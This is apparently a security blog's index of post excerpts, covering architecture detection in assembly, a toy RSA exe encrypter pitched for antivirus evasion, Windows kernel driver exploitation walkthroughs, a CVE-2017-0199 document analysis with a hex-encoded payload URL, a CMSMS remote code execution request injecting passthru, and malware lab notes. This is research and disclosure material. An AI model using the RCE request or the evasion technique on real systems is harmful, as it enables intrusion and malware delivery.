Detecting Architecture in Windows

After a while I thought of posting something interesting I noticed. Some of you know this old method of detecting the architecture using the CS segment register. This was also used in the Kronos malware

xor   eax,eax
mov   ax,cs
shr   eax,5


I had a look at the segment registers last night and I found out that we can use ES, GS and FS segment registers for detecting the architecture as well.

Using ES

; Author : @OsandaMalith
main:
xor eax,eax
mov ax,es
ror ax, 0x3
and eax,0x1
test eax, eax
je thirtytwo
invoke MessageBox,0, 'You are Running 64-bit', 'Architecture', MB_OK + MB_ICONINFORMATION
jmp exit

thirtytwo:
invoke MessageBox,0, 'You are Running 32-bit', 'Architecture', MB_OK + MB_ICONINFORMATION

exit:
invoke ExitProcess, 0



A Basic RSA Encrypter

This is a small post about implementing a basic RSA encrypter to encrypt sections in an exe. We can use this to exchange exes with people. We will encrypt the section using the public key and the user has to use his private key to decrypt the exe. This can be applied in evading anti-viruses too.

I will use multiplication instead of an exponent. Since it would be easy to implement in few lines in assembly. However, this will allow breaking the private key easily hence the complete scheme is broken.

$Enc = (m*e) \text{ mod } N$

$Dec = (c*d) \text{ mod } N$

The correctness of this scheme depends on the fact that

$Dec(Enc(m)) = (m*e*d) \text{ mod } N = m \text{ mod } N$

eLearnSecurity Courses

With the competitiveness of the infosec industry, security training is definitely needed. Let me share my story. Back in 2013 I heard about eLearnSecurity. Those days the only courses was Penetration Testing Professional and Penetration Testing Student. But I didnāt have enough money to sign up since I was 16 years old. With the pocket money I had, I signed up for the Penetration Testing Student course since I was curious about the material. I was amazed by their teaching techniques. Everything was so clearly written. After that I had to enter university and I had no time to concentrate on the things I like to do. Gradually eLearnSecurity started developing specialized courses starting from Web Application Penetration Testing and next came the Extreme edition of this. Meanwhile, they launched a course on reverse engineering too which I was really surprised to see that course since it was the first ever course I saw on reverse engineering.
(more…)

Windows Kernel Exploitation ā Null Pointer Dereference

Today Iām sharing on exploiting the null pointer dereference vulnerability present in the HackSysExtreme Vulnerable Driver.

The Vulnerability

You can view the source from here.

NTSTATUS TriggerNullPointerDereference(IN PVOID UserBuffer) {
ULONG UserValue = 0;
NTSTATUS Status = STATUS_SUCCESS;
PNULL_POINTER_DEREFERENCE NullPointerDereference = NULL;

PAGED_CODE();

__try {
// Verify if the buffer resides in user mode
sizeof(NULL_POINTER_DEREFERENCE),
(ULONG)__alignof(NULL_POINTER_DEREFERENCE));

// Allocate Pool chunk
NullPointerDereference = (PNULL_POINTER_DEREFERENCE)
ExAllocatePoolWithTag(NonPagedPool,
sizeof(NULL_POINTER_DEREFERENCE),
(ULONG)POOL_TAG);

if (!NullPointerDereference) {
// Unable to allocate Pool chunk
DbgPrint(&quot;[-] Unable to allocate Pool chunk\n&quot;);

Status = STATUS_NO_MEMORY;
return Status;
}
else {
DbgPrint(&quot;[+] Pool Tag: %s\n&quot;, STRINGIFY(POOL_TAG));
DbgPrint(&quot;[+] Pool Type: %s\n&quot;, STRINGIFY(NonPagedPool));
DbgPrint(&quot;[+] Pool Size: 0x%X\n&quot;, sizeof(NULL_POINTER_DEREFERENCE));
DbgPrint(&quot;[+] Pool Chunk: 0x%p\n&quot;, NullPointerDereference);
}

// Get the value from user mode
UserValue = *(PULONG)UserBuffer;

DbgPrint(&quot;[+] UserValue: 0x%p\n&quot;, UserValue);
DbgPrint(&quot;[+] NullPointerDereference: 0x%p\n&quot;, NullPointerDereference);

// Validate the magic value
if (UserValue == MagicValue) {
NullPointerDereference-&gt;Value = UserValue;
NullPointerDereference-&gt;Callback = &amp;NullPointerDereferenceObjectCallback;

DbgPrint(&quot;[+] NullPointerDereference-&gt;Value: 0x%p\n&quot;, NullPointerDereference-&gt;Value);
DbgPrint(&quot;[+] NullPointerDereference-&gt;Callback: 0x%p\n&quot;, NullPointerDereference-&gt;Callback);
}
else {
DbgPrint(&quot;[+] Freeing NullPointerDereference Object\n&quot;);
DbgPrint(&quot;[+] Pool Tag: %s\n&quot;, STRINGIFY(POOL_TAG));
DbgPrint(&quot;[+] Pool Chunk: 0x%p\n&quot;, NullPointerDereference);

// Free the allocated Pool chunk
ExFreePoolWithTag((PVOID)NullPointerDereference, (ULONG)POOL_TAG);

// Set to NULL to avoid dangling pointer
NullPointerDereference = NULL;
}

#ifdef SECURE
// Secure Note: This is secure because the developer is checking if
// 'NullPointerDereference' is not NULL before calling the callback function
if (NullPointerDereference) {
NullPointerDereference-&gt;Callback();
}
#else
DbgPrint(&quot;[+] Triggering Null Pointer Dereference\n&quot;);

// Vulnerability Note: This is a vanilla Null Pointer Dereference vulnerability
// because the developer is not validating if 'NullPointerDereference' is NULL
// before calling the callback function
NullPointerDereference-&gt;Callback();
#endif
}
__except (EXCEPTION_EXECUTE_HANDLER) {
Status = GetExceptionCode();
DbgPrint(&quot;[-] Exception Code: 0x%X\n&quot;, Status);
}

return Status;
}


As usual, everything is clearly explained in the source. At line 42 the āuserValueā is compared with the value ā0xBAD0B0B0ā and if it fails at line 58 the āNullPointerDereferenceā value is set to NULL and at line 73 the value āNullPointerDereferenceā is not validated whether itās NULL before calling the callback function.

Letās disassemble and see it closely. As you can see, if the provided āMagicValueā is wrong the value of āNullPointerDereferenceā is set to NULL to avoid the dangling pointer.
(more…)

Windows Kernel Exploitation – Arbitrary Overwrite

Today Iām sharing what I learned on developing an exploit for the arbitrary overwrite vulnerability present in the HackSysExtreme Vulnerable Driver. This is also known as the āwrite-what-whereā vulnerability. You can refer to my previous postĀ on exploiting the stack overflow vulnerability and the analysis of the shellcode.

The Vulnerability

You can check the source from here

NTSTATUS TriggerArbitraryOverwrite(IN PWRITE_WHAT_WHERE UserWriteWhatWhere) {
PULONG What = NULL;
PULONG Where = NULL;
NTSTATUS Status = STATUS_SUCCESS;

PAGED_CODE();

__try {
// Verify if the buffer resides in user mode
sizeof(WRITE_WHAT_WHERE),
(ULONG)__alignof(WRITE_WHAT_WHERE));

What = UserWriteWhatWhere-&gt;What;
Where = UserWriteWhatWhere-&gt;Where;

DbgPrint(&quot;[+] UserWriteWhatWhere: 0x%p\n&quot;, UserWriteWhatWhere);
DbgPrint(&quot;[+] WRITE_WHAT_WHERE Size: 0x%X\n&quot;, sizeof(WRITE_WHAT_WHERE));
DbgPrint(&quot;[+] UserWriteWhatWhere-&gt;What: 0x%p\n&quot;, What);
DbgPrint(&quot;[+] UserWriteWhatWhere-&gt;Where: 0x%p\n&quot;, Where);

#ifdef SECURE
// Secure Note: This is secure because the developer is properly validating if address
// pointed by 'Where' and 'What' value resides in User mode by calling ProbeForRead()
// routine before performing the write operation

*(Where) = *(What);
#else
DbgPrint(&quot;[+] Triggering Arbitrary Overwrite\n&quot;);

// Vulnerability Note: This is a vanilla Arbitrary Memory Overwrite vulnerability
// because the developer is writing the value pointed by 'What' to memory location
// pointed by 'Where' without properly validating if the values pointed by 'Where'
// and 'What' resides in User mode
*(Where) = *(What);
#endif
}
__except (EXCEPTION_EXECUTE_HANDLER) {
Status = GetExceptionCode();
DbgPrint(&quot;[-] Exception Code: 0x%X\n&quot;, Status);
}

return Status;
}


Everything is well explained in the source code. Basically the āwhereā and āwhatā pointers are not validated whether they are located in userland. Due to this we can overwrite an arbitrary kernel address with an arbitrary value.
(more…)

One of my friends from Bangladesh @rudr4_sarkar sent me this link to analyze which leads to a Word document.

I figured out that this was the CVE-2017-0199 exploit. It was simple to find the payload.

b = '00000068007400740070003a002f002f006d006f007a0069006c006c00610074006d002e0063006f006d002f006c006f006100640069006e0067002e00680074006d006c00000000'

&quot;&quot;.join(&quot;{0}&quot;.format((i+j).replace('00','').decode('hex')) for i, j in zip(b[::2], b[1::2]))



This exploit will deliver a malicious HTA file and execute it. HTA means IE, so yeah VBScript will execute nicely.
(more…)

Cryptculator

With the recent CTF’s I’ve played, I thought of coding an app to calculate big numbers easily, instead of manually programming. At times playing with big numbers is painful. I have written this in MASM32 and have used biglib for big numbers.

CMSMS 2.1.6 Multiple Vulnerabilities

One day I felt like reviewing the source code of some random CMS and I picked CMSMS. This is totally random and I did this to kill boredom.

Remote Code Execution – CVE-2017-8912

In admin/editusertag.php you can create custom user defined tags in which evil PHP functions are not blacklisted.

POST /cms/cmsimple/admin/editusertag.php?_sk_=2a7da2216d41e0ac&amp;userplugin_id=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 115
Connection: close
Pragma: no-cache
Cache-Control: no-cache

_sk_=2a7da2216d41e0ac&amp;userplugin_id=4&amp;userplugin_name=aaa&amp;code=passthru('dir')%3B&amp;description=&amp;run=1&amp;apply=1&amp;ajax=1


Lab 13-02 Analysis

I felt bored and thought of having a look at this exe. These are my rough notes on this one.
Every 5 seconds the function ā401851ā is called.

Basically, this malware takes screenshots and encrypts them and stores them in the current directory starting with ātemp%08xā % GetTickCount().

A Simple API Monitor

This is a simple Windbg script to monitor common Win32 API calls and display the strings, IPs, Ports, Registry keys passed to the APIs. The Win32 API is huge and I have used common APIs used by programs and malware. I coded this for fun š

Usage: ApiMon.wds run; g;


You can remove APIs as you wish to minimize the output or you can add any API you desire. For example

bp DLLName!APIName @&quot;$$&gt;a&lt;{arg0} APIName FileNamePtr bp kernelbase!CreateFileA @&quot;$$&gt;a&lt;${$arg0} CreateFileA 1&quot;;


This is a sample output that uses CreateProcess API.

This is from running netcat.